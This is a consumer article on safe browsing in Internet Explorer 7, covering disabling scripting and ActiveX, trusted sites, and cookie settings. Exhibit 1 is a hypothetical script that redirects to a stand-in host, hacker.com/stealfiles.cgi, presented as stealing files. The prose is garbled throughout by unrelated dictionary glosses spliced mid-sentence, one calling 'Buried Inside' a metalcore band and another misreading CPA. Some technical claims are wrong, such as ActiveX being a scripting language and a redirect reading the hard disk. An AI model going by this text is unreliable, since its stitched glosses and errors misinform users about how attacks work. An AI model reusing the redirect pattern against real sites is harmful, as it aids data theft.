Surf safely: how to avoid Internet minefields.The Internet is a gold mine of information, but its also a minefield, loaded with scores of innocent-looking sites that contain stealthy stealth·y adj. stealth·i·er, stealth·i·est Marked by or acting with quiet, caution, and secrecy intended to avoid notice. See Synonyms at secret. programs designed to steal or destroy your data. But if you take proper precautions, you can browse the Web with relative safety. In our illustration for ways to surf the Web, we use Microsoft's latest browser, Internet Explorer Microsoft's Web browser, which comes with Windows starting with Windows 98. Commonly called "IE," versions for Mac and Unix are also available. Internet Explorer is the most widely used Web browser on the market. It has also been the browser engine in AOL's Internet access software. version 7, but you can apply these recommendations to other browsers as well. GOING OR COMING? When users surf the Web, they say they "go to" a page. In reality, though, when you type a URL URL in full Uniform Resource Locator Address of a resource on the Internet. The resource can be any type of file stored on a server, such as a Web page, a text file, a graphics file, or an application program. (such as www.samplesite.com) or click on a link, the page actually is brought to your browser in the form of hypertext markup language (hypertext, World-Wide Web, standard) Hypertext Markup Language - (HTML) A hypertext document format used on the World-Wide Web. HTML is built on top of SGML. "Tags" are embedded in the text. A tag consists of a "<", a "directive" (in lower case), zero or more parameters and a ">". (HTML HTML in full HyperText Markup Language Markup language derived from SGML that is used to prepare hypertext documents. Relatively easy for nonprogrammers to master, HTML is the language used for documents on the World Wide Web. )--the programming code that creates the screen image. In some cases, a malicious miniature program (written in what's called a scripting language A high-level programming, or command, language that is interpreted (translated on the fly) rather than compiled ahead of time. A scripting, or script, language may be a general-purpose programming language or it may be limited to specific functions used to augment the running of an ) is hitching a ride with that HTML code. The moment that infected page reaches you, the hitchhiker executes its devilish dev·il·ish adj. 1. Of, resembling, or characteristic of a devil, as: a. Malicious; evil. b. Mischievous, teasing, or annoying. 2. Excessive; extreme: devilish heat. program, which can do many nasty things, including copy your files, transmit them to the thief's computer or simply erase them. Such a script also can change your Windows system settings, leaving your computer in utter disarray. How can a script steal information off someone's hard disk? Exhibit 1 is an example of a hypothetical script buried inside Buried Inside is a metalcore band from Ottawa, Canada. Influenced by early metalcore bands such as Acme, One Eyed Prophecy, Union of Uranus, as well as countless East-Coast USA and Quebec hardcore bands, they formed in 1997. a Web page. Of course, a real script would not identify itself as coming from a dangerous hacker. Exhibit 1 <script type="text/javascript"> <!-- window.location=http://www.hacker.com/stealfiles.cgi //==> </script> If you were to receive this fictitious script, the hacker's program would momentarily control your computer and you would be instantly redirected to his site, www.hacker.com. Once there, a sophisticated program called stealfiles.cgi would snap into action, steal data off your hard disk, then redirect you back to the original Web page. All this could happen in just a few seconds, without your ever being aware of it. Be assured most Web sites are safe. However, a criminal hacker A criminal who uses hacker techniques to break the law. Originally, the term "hacker" referred only to a highly technical programmer. Today, the term is often used synonymously with criminal. "Criminal hacker" and "cracker" are the most accurate references to this individual. will try to inject a malicious script into almost any Web site--a scenario known as cross-site scripting See XSS. , or XSS (CROSS-Site Scripting) Causing a user's Web browser to execute a malicious script. There are several ways this is done. One approach is to hide code in a "click here" hyperlink attached to a URL that points to a non-existent Web page. . Although anti-spyware programs are designed to thwart malicious scripts, they don't always work because clever scriptwriters often stay a few steps ahead of them (see accompanying article, "Spyware Protection"). So what's the alternative? If you want total safety, you have no choice but to take matters into your own hands and disable all scripts from running on your browser. And that's easier than you think. DO-IT-YOURSELF PROTECTION To disable scripts, click on Tools, Internet Options, Security (see Exhibit 2). Under Select a zone to view or change security settings, click on Internet if it's not already highlighted. Then under Security level for this zone, click on Custom level. [ILLUSTRATION OMITTED] You now should be at a menu called Security Settings-Internet Zone (see Exhibit 3). Slide down the scrollbar to the area labeled ActiveX controls and plug-ins and click on Disable for all 10 options. ActiveX is a Microsoft scripting language. [ILLUSTRATION OMITTED] Then slide farther down the screen to the second section from the bottom called Scripting (see Exhibit 4) and click on Disable for all five options. This will stop any script that manages to get into your computer. [ILLUSTRATION OMITTED] To implement your changes, click on OK at the bottom of the panel (see Exhibit 5). [ILLUSTRATION OMITTED] CONSEQUENCES OF DISABLING SCRIPTING You do pay a price for disabling scripting. For example, for those who use Yahoo e-mail, disabled scripting triggers a message asking you to either turn on JavaScript or switch back to an older version of Yahoo Mail See Yahoo! Mail. (see Exhibit 6). But if safety is your primary concern, the cost is worth it. [ILLUSTRATION OMITTED] Similarly, if you use a stock ticker Stock ticker A letter designation assigned to securities and mutual funds that trade on US financial exchanges. at a financial site, such as http://moneycentral.msn.com/investor/home.asp, you will lose the Quote watchlist box (see Exhibit 7). You can reinstate the ticker if you enable JavaScript. [ILLUSTRATION OMITTED] You may wish to experiment with your favorite Web pages to see whether you can tolerate the loss of functionality. Remember, you can always change your mind and re-enable scripting at any time. You also have the option of specifying sites you know are safe and allowing scripts to run when you visit them. To do that, go back to the Security tab in Internet Options (Exhibit 2), but this time select Trusted sites. Then click on the Sites button and list those you visit and know are safe. When finished, click on OK and then adjust the security level for the Trusted sites zone just as you did for the Internet zone, but this time enable scripting. COOKIE-CUTTING Many Web sites acknowledge your visit by sending your computer a small text file called a cookie. Cookies do many things: They keep track of all visitors and remember what they did and looked at. While most cookies are benign, some store information you enter when you buy something at the site--your credit card number, address, phone and, in some cases, even your Social Security number and the identity of your bank account. Although some sites keep cookie information under tight security, others don't bother to encrypt cookies. If safety is a priority, you probably want to implement some kind of cookie control. A cookie may stay permanently on your hard disk (called a persistent cookie) or just be for a single Web visit (session cookie Noun 1. session cookie - a cookie that is stored temporarily and is destroyed when you close the link cookie - a short line of text that a web site puts on your computer's hard drive when you access the web site ). If you have a persistent cookie, any sensitive information on your hard disk is at risk of being stolen. Getting rid of cookies is easy While in your browser, click on Tools, Internet Options, General. Under the Browsing history section, click on Settings and then under Current location click View files. Now go to the Name column, right-click on the cookie you want to delete and choose Delete. You can easily identify those cookies that contain sensitive data from sites where you purchased products and entered financial information. You'll also see cookie expiration dates that are many years into the future. Unless they are truly benign, delete them. To play it safe, however, it's best to tell your browser not to accept any persistent cookies. To do this, go to Tools, Internet Options, Privacy and click on the Advanced button. You'll see a menu that resembles Exhibit 8. [ILLUSTRATION OMITTED] Click on Override automatic cookie handling, and Block for First-party Cookies and Third-party Cookies. Click also on Always allow session cookies. This will allow your browser to only accept temporary session cookies while you interact with certain sites; otherwise many sites will deny you access. When a Web site asks whether you would like to remain logged in, it actually is asking you whether you want to accept a persistent cookie. If you answer "yes," the site will send you a persistent cookie with your logon information. Always say "no." How much computer safety you need is a personal matter, and it depends on how much you value your data. Although there are commercial programs designed to make your workspace relatively safe, as you can see, gaps remain. The only way to be sure is to take action yourself to close the gap. Key to Instructions To help readers follow the instructions in this article, we use two different typefaces: Boldface type is used to identify the names of functions, menu items, agendas and URLs. Sans serif Short horizontal lines added to the tops and bottoms of traditional typefaces, such as Times Roman. Contrast with sans-serif.  type shows the names
of files and the names of commands and instructions that users should
type into the computer:
James F. Leon, CPA (Computer Press Association, Landing, NJ) An earlier membership organization founded in 1983 that promoted excellence in computer journalism. Its annual awards honored outstanding examples in print, broadcast and electronic media. The CPA disbanded in 2000. , CISSP (Certified Information Systems Security Professional) The award for successful completion of an examination in computer security administered by the International Information Systems Security Certification Consortium (ISC)2. , is a visiting assistant professor and the director of IT training in the Department of Computer Science at Northern Illinois University , Dekalb. His e-mail address See Internet address. e-mail address - electronic mail address is jimleon@cs.niu.edu. |
|
||||||||||||||||
Printer friendly
Cite/link
Email
Feedback
Reader Opinion